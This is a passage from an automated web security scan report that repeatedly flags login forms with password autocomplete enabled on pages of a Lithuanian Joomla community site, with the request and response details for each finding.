...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.141. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.142. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.143. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/5-pirmasis-joomla-gimtadienis.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.144. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.145. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15915


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.146. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/67-joomla-16-rc1-versija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.147. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.148. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:34 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.149. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/70-joomla-16-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.150. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.151. http://www.lithuanianjoomla.com/joomla-sasajos.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-sasajos.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-sasajos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-sasajos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-sasajos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.152. http://www.lithuanianjoomla.com/joomla-saugumas.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-saugumas.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-saugumas.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-saugumas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-saugumas.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.153. http://www.lithuanianjoomla.com/joomla-versijos.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-versijos.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-versijos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-versijos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16049


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-versijos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.154. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /kaip-idiegti-joomla.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /kaip-idiegti-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/kaip-idiegti-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.155. http://www.lithuanianjoomla.com/kontaktai.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /kontaktai.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/kontaktai.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /kontaktai.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17140


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/kontaktai.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.156. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /lithuanianjoomlacom-misija.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /lithuanianjoomlacom-misija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/lithuanianjoomlacom-misija.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.157. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /lithuanianjoomlacom-vizija.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /lithuanianjoomlacom-vizija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13484


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/lithuanianjoomlacom-vizija.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.158. http://www.lithuanianjoomla.com/naujienos.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /naujienos.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /naujienos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:49 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13215


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.159. http://www.lithuanianjoomla.com/saugi-joomla.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/saugi-joomla.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /saugi-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:05 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/saugi-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.160. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/saugi-joomla.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
